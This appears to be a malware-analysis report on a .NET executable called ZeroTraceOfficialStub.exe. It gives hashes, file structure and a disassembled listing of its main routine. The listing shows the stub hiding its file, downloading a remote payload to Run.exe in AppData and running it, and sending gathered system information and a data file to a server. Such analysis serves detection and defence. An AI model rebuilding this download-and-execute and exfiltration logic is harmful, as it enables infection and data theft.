Suspicious
Suspect

2a0955539bd323135dd9d1f0dc6cb965

PE Executable
|
MD5: 2a0955539bd323135dd9d1f0dc6cb965
|
Size: 11.23 MB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Medium

Hash
 Hash Value
MD5
2a0955539bd323135dd9d1f0dc6cb965
Sha1
c444076370ff0453111a863ea68341f29cb5f605
Sha256
b42e97c12a39ea8ce7d889b1487f497de27a49549467fa8dbf9d8ac9cca9e8cc
Sha384
e74970c9c8c75da7173408705c35c7b3c657f999ea8e185b6ea32a737fae44b4077ff201d669b3b34394f0f282268c38
Sha512
765c5901ecb08eb05a3a1095d555faf614adfa3de1117837ae56a3f8fd06e5066d2ae369d68c7a1c261ee5f0ca189a5b5b784940e8815f300d00b8e12eb80b6f
SSDeep
49152:epj5ULc3g4k2vX9OLQTM+acHEGSEGGVjb03xFKj0ia+CtbQuIrYIvVhARgzD1Rqo:
TLSH
BAB6382439FA501AB173EFAA8BE479EADA6FB7733B07645D105003864723981DEC153E
File Structure
2a0955539bd323135dd9d1f0dc6cb965
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
7b2ef50a5bd048be8bad9e1b4efd2a6d
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

ZeroTraceOfficialStub.exe
Full Name

ZeroTraceOfficialStub.exe
EntryPoint

System.Void ZeroTrace_Client.Program::a(System.String[])
Scope Name

ZeroTraceOfficialStub.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

ZeroTraceOfficialStub
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.7.2
Total Strings

948
Main Method

System.Void ZeroTrace_Client.Program::a(System.String[])
Main IL Instruction Count

278
Main IL

call System.Void ZeroTrace_Client.Program::a() ldc.i4.0 <null> br.s IL_0009: switch(IL_0047,IL_005E,IL_007A,IL_0094,IL_00AE,IL_00C8,IL_00EA,IL_010D,IL_0146,IL_0169,IL_01A7,IL_01C5,IL_03D9) ldc.i4.0 <null> switch dnlib.DotNet.Emit.Instruction[] br IL_03EA: ret ldstr Server IP: ldsfld System.String ZeroTrace_Client.Program::G call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) ldc.i4.1 <null> br.s IL_0009: switch(IL_0047,IL_005E,IL_007A,IL_0094,IL_00AE,IL_00C8,IL_00EA,IL_010D,IL_0146,IL_0169,IL_01A7,IL_01C5,IL_03D9) ldstr Server Port: {0} ldsfld System.Int32 ZeroTrace_Client.Program::a box System.Int32 call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) ldc.i4.2 <null> br.s IL_0009: switch(IL_0047,IL_005E,IL_007A,IL_0094,IL_00AE,IL_00C8,IL_00EA,IL_010D,IL_0146,IL_0169,IL_01A7,IL_01C5,IL_03D9) ldstr inj: ldsfld System.String ZeroTrace_Client.Program::h call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) ldc.i4.3 <null> br IL_0009: switch(IL_0047,IL_005E,IL_007A,IL_0094,IL_00AE,IL_00C8,IL_00EA,IL_010D,IL_0146,IL_0169,IL_01A7,IL_01C5,IL_03D9) ldstr uac: ldsfld System.String ZeroTrace_Client.Program::H call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) ldc.i4.4 <null> br IL_0009: switch(IL_0047,IL_005E,IL_007A,IL_0094,IL_00AE,IL_00C8,IL_00EA,IL_010D,IL_0146,IL_0169,IL_01A7,IL_01C5,IL_03D9) ldstr downloadexecute: ldsfld System.String ZeroTrace_Client.Program::i call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) ldc.i4.5 <null> br IL_0009: switch(IL_0047,IL_005E,IL_007A,IL_0094,IL_00AE,IL_00C8,IL_00EA,IL_010D,IL_0146,IL_0169,IL_01A7,IL_01C5,IL_03D9) ldsfld System.String ZeroTrace_Client.Program::h ldstr 1 call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_00EC: ldsfld System.String ZeroTrace_Client.Program::h call System.String System.Windows.Forms.Application::get_ExecutablePath() ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldc.i4.6 <null> br IL_0009: switch(IL_0047,IL_005E,IL_007A,IL_0094,IL_00AE,IL_00C8,IL_00EA,IL_010D,IL_0146,IL_0169,IL_01A7,IL_01C5,IL_03D9) br.s IL_0123: ldsfld System.String ZeroTrace_Client.Program::H ldsfld System.String ZeroTrace_Client.Program::h ldstr 0 call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_010F: ldstr "Unexpected value for inj: " ldstr hide is disabled (value is 0) call System.Void System.Console::WriteLine(System.String) ldc.i4.7 <null> br IL_0009: switch(IL_0047,IL_005E,IL_007A,IL_0094,IL_00AE,IL_00C8,IL_00EA,IL_010D,IL_0146,IL_0169,IL_01A7,IL_01C5,IL_03D9) br.s IL_0123: ldsfld System.String ZeroTrace_Client.Program::H ldstr Unexpected value for inj: ldsfld System.String ZeroTrace_Client.Program::h call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) ldsfld System.String ZeroTrace_Client.Program::H ldstr 1 call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0147: ldsfld System.String ZeroTrace_Client.Program::H call System.Boolean ZeroTrace_Client.Program::a() brtrue.s IL_017F: ldsfld System.String ZeroTrace_Client.Program::i call System.Void ZeroTrace_Client.Program::A() ldc.i4.8 <null> br IL_0009: switch(IL_0047,IL_005E,IL_007A,IL_0094,IL_00AE,IL_00C8,IL_00EA,IL_010D,IL_0146,IL_0169,IL_01A7,IL_01C5,IL_03D9) ret <null> ldsfld System.String ZeroTrace_Client.Program::H ldstr 0 call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_016B: ldstr "Unexpected value for inj: " ldstr uac is disabled (value is 0) call System.Void System.Console::WriteLine(System.String) ldc.i4.s 9 br IL_0009: switch(IL_0047,IL_005E,IL_007A,IL_0094,IL_00AE,IL_00C8,IL_00EA,IL_010D,IL_0146,IL_0169,IL_01A7,IL_01C5,IL_03D9) br.s IL_017F: ldsfld System.String ZeroTrace_Client.Program::i ldstr Unexpected value for inj: ldsfld System.String ZeroTrace_Client.Program::h call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) ldsfld System.String ZeroTrace_Client.Program::i ldstr 0 call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01DC: call System.String ZeroTrace_Client.Program::i() newobj System.Void System.Net.WebClient::.ctor() ldsfld System.String ZeroTrace_Client.Program::i callvirt System.Byte[] System.Net.WebClient::DownloadData(System.String) stloc.0 <null> ldc.i4.s 10 br IL_0009: switch(IL_0047,IL_005E,IL_007A,IL_0094,IL_00AE,IL_00C8,IL_00EA,IL_010D,IL_0146,IL_0169,IL_01A7,IL_01C5,IL_03D9) ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \Run.exe call System.String System.String::Concat(System.String,System.String) ldloc.0 <null> call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 11 br IL_0009: switch(IL_0047,IL_005E,IL_007A,IL_0094,IL_00AE,IL_00C8,IL_00EA,IL_010D,IL_0146,IL_0169,IL_01A7,IL_01C5,IL_03D9) ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \Run.exe call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> call System.String ZeroTrace_Client.Program::i() stloc.1 <null> ldc.i4.0 <null> br.s IL_01E6: switch(IL_022C,IL_0235,IL_023E,IL_0248,IL_0252,IL_025C,IL_0266,IL_027C,IL_0292,IL_02A9,IL_02C1,IL_0354,IL_0362,IL_0377,IL_0387) ldc.i4.0 <null> switch dnlib.DotNet.Emit.Instruction[] br IL_039A: ldloc.s V_8 call System.String ZeroTrace_Client.Program::j() stloc.2 <null> ldc.i4.1 <null> br.s IL_01E6: switch(IL_022C,IL_0235,IL_023E,IL_0248,IL_0252,IL_025C,IL_0266,IL_027C,IL_0292,IL_02A9,IL_02C1,IL_0354,IL_0362,IL_0377,IL_0387) call System.String ZeroTrace_Client.Program::J() stloc.3 <null> ldc.i4.2 <null> br.s IL_01E6: switch(IL_022C,IL_0235,IL_023E,IL_0248,IL_0252,IL_025C,IL_0266,IL_027C,IL_0292,IL_02A9,IL_02C1,IL_0354,IL_0362,IL_0377,IL_0387) call System.String ZeroTrace_Client.Program::k() stloc.s V_4 ldc.i4.3 <null> br.s IL_01E6: switch(IL_022C,IL_0235,IL_023E,IL_0248,IL_0252,IL_025C,IL_0266,IL_027C,IL_0292,IL_02A9,IL_02C1,IL_0354,IL_0362,IL_0377,IL_0387) call System.Boolean ZeroTrace_Client.Program::b() stloc.s V_5 ldc.i4.4 <null> br.s IL_01E6: switch(IL_022C,IL_0235,IL_023E,IL_0248,IL_0252,IL_025C,IL_0266,IL_027C,IL_0292,IL_02A9,IL_02C1,IL_0354,IL_0362,IL_0377,IL_0387) call System.Boolean ZeroTrace_Client.Program::B() stloc.s V_6 ldc.i4.5 <null> br.s IL_01E6: switch(IL_022C,IL_0235,IL_023E,IL_0248,IL_0252,IL_025C,IL_0266,IL_027C,IL_0292,IL_02A9,IL_02C1,IL_0354,IL_0362,IL_0377,IL_0387) call System.Boolean ZeroTrace_Client.Program::c() stloc.s V_7 ldc.i4.6 <null> br.s IL_01E6: switch(IL_022C,IL_0235,IL_023E,IL_0248,IL_0252,IL_025C,IL_0266,IL_027C,IL_0292,IL_02A9,IL_02C1,IL_0354,IL_0362,IL_0377,IL_0387) ldstr Country: ldloc.1 <null> call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) ldc.i4.7 <null> br IL_01E6: switch(IL_022C,IL_0235,IL_023E,IL_0248,IL_0252,IL_025C,IL_0266,IL_027C,IL_0292,IL_02A9,IL_02C1,IL_0354,IL_0362,IL_0377,IL_0387) ldstr OS: ldloc.2 <null> call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) ldc.i4.8 <null> br IL_01E6: switch(IL_022C,IL_0235,IL_023E,IL_0248,IL_0252,IL_025C,IL_0266,IL_027C,IL_0292,IL_02A9,IL_02C1,IL_0354,IL_0362,IL_0377,IL_0387) ldstr GPU: ldloc.3 <null> call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) ldc.i4.s 9 br IL_01E6: switch(IL_022C,IL_0235,IL_023E,IL_0248,IL_0252,IL_025C,IL_0266,IL_027C,IL_0292,IL_02A9,IL_02C1,IL_0354,IL_0362,IL_0377,IL_0387) ldstr CPU: ldloc.s V_4 call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) ldc.i4.s 10 br IL_01E6: switch(IL_022C,IL_0235,IL_023E,IL_0248,IL_0252,IL_025C,IL_0266,IL_027C,IL_0292,IL_02A9,IL_02C1,IL_0354,IL_0362,IL_0377,IL_0387) ldc.i4.s 13 newarr System.String dup <null> ldc.i4.0 <null> ldloc.1 <null> stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr | stelem.ref <null> dup <null> ldc.i4.2 <null> ldloc.2 <null> stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr | stelem.ref <null> dup <null> ldc.i4.4 <null> ldloc.3 <null> stelem.ref <null> dup <null> ldc.i4.5 <null> ldstr | stelem.ref <null> dup <null> ldc.i4.6 <null> ldloc.s V_4 stelem.ref <null> dup <null> ldc.i4.7 <null> ldstr | stelem.ref <null> dup <null> ldc.i4.8 <null> ldloc.s V_5 brtrue.s IL_0306: ldstr "1" ldstr 0 br.s IL_030B: stelem.ref ldstr 1 stelem.ref <null> dup <null> ldc.i4.s 9 ldstr | stelem.ref <null> dup <null> ldc.i4.s 10 ldloc.s V_6 brtrue.s IL_0323: ldstr "1" ldstr 0 br.s IL_0328: stelem.ref ldstr 1 stelem.ref <null> dup <null> ldc.i4.s 11 ldstr | stelem.ref <null> dup <null> ldc.i4.s 12 ldloc.s V_7 brtrue.s IL_0340: ldstr "1" ldstr 0 br.s IL_0345: stelem.ref ldstr 1 stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_8 ldc.i4.s 11 br IL_01E6: switch(IL_022C,IL_0235,IL_023E,IL_0248,IL_0252,IL_025C,IL_0266,IL_027C,IL_0292,IL_02A9,IL_02C1,IL_0354,IL_0362,IL_0377,IL_0387) call System.String ZeroTrace_Client.Program::a() stloc.s V_9 ldc.i4.s 12 br IL_01E6: switch(IL_022C,IL_0235,IL_023E,IL_0248,IL_0252,IL_025C,IL_0266,IL_027C,IL_0292,IL_02A9,IL_02C1,IL_0354,IL_0362,IL_0377,IL_0387) ldloc.s V_9 brfalse.s IL_0389: ldstr "Sending system info only..." ldstr Sending system info and data file to server... call System.Void System.Console::WriteLine(System.String) ldc.i4.s 13 br IL_01E6: switch(IL_022C,IL_0235,IL_023E,IL_0248,IL_0252,IL_025C,IL_0266,IL_027C,IL_0292,IL_02A9,IL_02C1,IL_0354,IL_0362,IL_0377,IL_0387) ldloc.s V_8 ldloc.s V_9 call System.Void ZeroTrace_Client.Program::a(System.String,System.String) ldc.i4.s 14 br IL_01E6: switch(IL_022C,IL_0235,IL_023E,IL_0248,IL_0252,IL_025C,IL_0266,IL_027C,IL_0292,IL_02A9,IL_02C1,IL_0354,IL_0362,IL_0377,IL_0387) br.s IL_03A1: leave.s IL_03C8 ldstr Sending system info only... call System.Void System.Console::WriteLine(System.String) ldc.i4.s 15 br IL_01E6: switch(IL_022C,IL_0235,IL_023E,IL_0248,IL_0252,IL_025C,IL_0266,IL_027C,IL_0292,IL_02A9,IL_02C1,IL_0354,IL_0362,IL_0377,IL_0387) ldloc.s V_8 call System.Void ZeroTrace_Client.Program::a(System.String) leave.s IL_03C8: ldstr "Program will exit in 5 seconds..." stloc.s V_10 ldc.i4.0 <null> br.s IL_03A9: brfalse.s IL_03AD ldc.i4.0 <null> brfalse.s IL_03AD: ldstr "Error: " br.s IL_03C6: leave.s IL_03C8 ldstr Error: ldloc.s V_10 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) ldc.i4.1 <null> br.s IL_03A9: brfalse.s IL_03AD leave.s IL_03C8: ldstr "Program will exit in 5 seconds..." ldstr Program will exit in 5 seconds... call System.Void System.Console::WriteLine(System.String) ldc.i4.s 12 br IL_0009: switch(IL_0047,IL_005E,IL_007A,IL_0094,IL_00AE,IL_00C8,IL_00EA,IL_010D,IL_0146,IL_0169,IL_01A7,IL_01C5,IL_03D9) ldc.i4 5000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldc.i4.s 13 br IL_0009: switch(IL_0047,IL_005E,IL_007A,IL_0094,IL_00AE,IL_00C8,IL_00EA,IL_010D,IL_0146,IL_0169,IL_01A7,IL_01C5,IL_03D9) ret <null>
2a0955539bd323135dd9d1f0dc6cb965 (11.23 MB)
File Structure
2a0955539bd323135dd9d1f0dc6cb965
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
7b2ef50a5bd048be8bad9e1b4efd2a6d
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙